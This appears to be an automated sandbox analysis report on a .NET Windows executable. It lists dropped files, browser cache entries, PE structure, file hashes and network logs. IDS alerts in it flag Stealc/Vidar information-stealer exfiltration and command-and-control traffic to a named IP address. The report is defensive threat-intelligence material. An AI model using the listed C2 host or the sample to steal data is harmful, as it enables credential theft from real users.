Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9272.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4682
Entropy (8bit):	4.45864321786174
Encrypted:	false
SSDEEP:	48:cvIwWl8zsgJg77aI9sXWpW8VYpYm8M4JcdxPcf6Fz+q8vRdxPcfNvWinmad:uIjfmI72m7VVJNf4K2fNLnmad
MD5:	B2580F300ED2BB72C71C2A0E675DBC66
SHA1:	99A1598FF28D4E2BD8570F8E96023AB685E6D1FA
SHA-256:	A4E254B59E14D26231234270B0AC81992B750848098781AFE0C27D43ADBB3D6E
SHA-512:	E5460C2C103B1BFCA76129F00DEC068B6B1C485B81760BDB72EEAD36CE13F4B9173AE6D26C6DEC99AAAC7D831DFF8F574377A719CB269258E4CE7F2034992ACE
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="663010" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465524673388567
Encrypted:	false
SSDEEP:	6144:QIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN3dwBCswSbQ:1XD94+WlLZMM6YFHB+Q
MD5:	86592F7FFA79E6CC9E67F17C31052D0E
SHA1:	FAA0F77F12908D55D7E990B2C0D9C99FDD41EBBD
SHA-256:	E0F19381CC8FD067187F8C90CFCBF10F2F2B4B568D6C6B9BDE7C5C2C524D3E3F
SHA-512:	E8B54AFEF28C38879157CA27C857C030608C9A463803578B4649F5777C1B8889845BF3E667A8F73F0BA0355C036E81FB5EB3F9B9ADFE54B967AF9929BD9F0705
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~[. ._..............................................................................................................................................................................................................................................................................................................................................}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 62

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3621)
Category:	downloaded
Size (bytes):	3626
Entropy (8bit):	5.842729263489881
Encrypted:	false
SSDEEP:	96:79ZlinH6666t7q7sK/sJOzRCJfT9CG9EsyQffffo:79WH6666tq7s2sJGmfZ9o
MD5:	3BE71A9FBBF7589E1AEEF6C248DB4115
SHA1:	38ABCC657DE5A76B39ECC05C8AB3E4E22551B563
SHA-256:	02892D4CD4F0B406385CC5ADF5BA753793C3552CD69F20621A0B0637FC1406EB
SHA-512:	2C873169929E9FD5AF3FE2BC883F4CB855C425B9107DC2EB500E5640C3A6734A0D274422CD30EF0E4953FBC4053E9337B3B013A9E21076CF6DA72C6AF13C5F7E
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["irs accepting tax returns","mount union football","nintendo switch","planets alignment","nyt mini crossword clues","snow storm weather forecast","ps plus games","nfl inactives week 18"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"google:entityinfo":"CgovbS8wbmNxNXR6Eg1Gb290YmFsbCB0ZWFtMqcPZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFRQU1CSWdBQ0VRRURFUUgveEFBYkFBQUNBZ01CQUFBQUFBQUFBQUFBQUFBQ0JRTUVBUVlIQVAvRUFEY1FBQUlDQVFNQ0F3VUdBd2tBQUFBQUFBRUNBd1FSQUFVaEVqRUdFMEVVSWxGU1lSWXljb0dSa3hWeHdTUWxOVUpWa3BTaDBmL0VBQmtCQUFNQkFRRUFBQUFBQUFBQUFBQUFBQUFCQXdRQ0JmL0VBQ0lSQVFBREFBSUFCZ01B

Chrome Cache Entry: 63

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1395)
Category:	downloaded
Size (bytes):	117446
Entropy (8bit):	5.490775275046353
Encrypted:	false
SSDEEP:	3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
MD5:	942EA4F96889BAE7D3C59C0724AB2208
SHA1:	033DDF473319500621D8EBB6961C4278E27222A7
SHA-256:	F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
SHA-512:	C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
Malicious:	false
URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

Chrome Cache Entry: 64

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 65

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	132739
Entropy (8bit):	5.436704478931504
Encrypted:	false
SSDEEP:	3072:fskJQ7O4N5dTm+syHEt4W3XdQ4Q6wuSr/nUW2i6o:f5Q7HTt/sHdQ4Q6wDfUW8o
MD5:	C655F5C4D942D3A1D6CE33391555BD33
SHA1:	66CF805E962F35B21BFD2A9369C22F58686F4D80
SHA-256:	C48512A209E29742491A7DFE14F14E3542096CA0CED0C732B430DA1C3AF665EA
SHA-512:	C6119C4144750FD13A3FC8436DEA0202A6E03BB5A7C20671E0C4D23F70507F96A71E3E7B923583F441FB3B86D1565248159848DACC62AA5D2E9740AE4D32819C
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 66

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2410)
Category:	downloaded
Size (bytes):	175897
Entropy (8bit):	5.549876394125764
Encrypted:	false
SSDEEP:	3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
MD5:	2368B9A3E1E7C13C00884BE7FA1F0DFC
SHA1:	8F88AD448B22177E2BDA0484648C23CA1D2AA09E
SHA-256:	577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
SHA-512:	105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi\|\|(_.Yi=new Zi)).set(a,b);(_.$i\|\|(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a\|2:a&-3;return(a\|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a\|1};_.hj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.ij=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_

Chrome Cache Entry: 67

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 68

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.9584360210319804
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	ZT0KQ1PC.exe
File size:	497'664 bytes
MD5:	6fe2f68f2eb2277e7f79d68d4d9b4879
SHA1:	44adb85acb84ab58b020f3114022ebb6d4516ab3
SHA256:	8bcdca66177ae9df564b790ba4311b4edf75664f152c4f9f3dd6725ffa14da23
SHA512:	2621f35f4e3b7f10c97bf34b991cb5dce7a1130674b5cfc3d08f97b49b78d7e12f7b02a2096b00c16fe0c58baf933dfc7871ae4a57c001497269a979df45589c
SSDEEP:	12288:cLsjDUqAoZSgyNhKZLFZViePQ0nU0KqlTpVLVh:cLsjwjoZ8e1DEuKq1xh
TLSH:	6FB42241B7878E76C7DA097165A386478BB4A306E50BEF6F398D2EE4DE22357120D307
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C,...............0.................. ........@.. ....................... ......:.....`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40a4be
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB22C430A [Sun Sep 21 17:53:14 2064 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa470	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x242	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa422	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x84c4	0x8600	e05f1acca24b974a8126be170dff517b	False	0.5043726679104478	data	5.950953039580874	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x242	0x400	14d8e51a66bfa2cb04d0bad62fb2e968	False	0.3037109375	data	3.5160679793070893	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe000	0xc	0x200	15941323991b3ba9288d6bda059fba10	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x10000	0x70800	0x70800	6a5e33e5eb4941efeb1e65512cd0f21a	False	1.0003276909722223	data	7.999608091703242	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xc058	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-05T20:07:59.119733+0100	2859378	ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2	1	192.168.2.4	49734	116.203.13.109	443	TCP
2025-01-05T20:08:02.251737+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	116.203.13.109	443	192.168.2.4	49740	TCP
2025-01-05T20:08:03.901437+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1	1	192.168.2.4	49742	116.203.13.109	443	TCP
2025-01-05T20:08:03.901649+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	116.203.13.109	443	192.168.2.4	49742	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 20:07:55.298149109 CET	49730	443	192.168.2.4	149.154.167.99
Jan 5, 2025 20:07:55.298190117 CET	443	49730	149.154.167.99	192.168.2.4
Jan 5, 2025 20:07:55.298280954 CET	49730	443	192.168.2.4	149.154.167.99
Jan 5, 2025 20:07:55.307955980 CET	49730	443	192.168.2.4	149.154.167.99
Jan 5, 2025 20:07:55.307971001 CET	443	49730	149.154.167.99	192.168.2.4
Jan 5, 2025 20:07:55.928821087 CET	443	49730	149.154.167.99	192.168.2.4
Jan 5, 2025 20:07:55.928884029 CET	49730	443	192.168.2.4	149.154.167.99
Jan 5, 2025 20:07:56.006587982 CET	49730	443	192.168.2.4	149.154.167.99
Jan 5, 2025 20:07:56.006611109 CET	443	49730	149.154.167.99	192.168.2.4
Jan 5, 2025 20:07:56.006880999 CET	443	49730	149.154.167.99	192.168.2.4
Jan 5, 2025 20:07:56.006932020 CET	49730	443	192.168.2.4	149.154.167.99
Jan 5, 2025 20:07:56.010029078 CET	49730	443	192.168.2.4	149.154.167.99
Jan 5, 2025 20:07:56.055329084 CET	443	49730	149.154.167.99	192.168.2.4
Jan 5, 2025 20:07:56.213337898 CET	443	49730	149.154.167.99	192.168.2.4
Jan 5, 2025 20:07:56.213362932 CET	443	49730	149.154.167.99	192.168.2.4
Jan 5, 2025 20:07:56.213393927 CET	49730	443	192.168.2.4	149.154.167.99
Jan 5, 2025 20:07:56.213402987 CET	443	49730	149.154.167.99	192.168.2.4
Jan 5, 2025 20:07:56.213422060 CET	443	49730	149.154.167.99	192.168.2.4
Jan 5, 2025 20:07:56.213433981 CET	49730	443	192.168.2.4	149.154.167.99
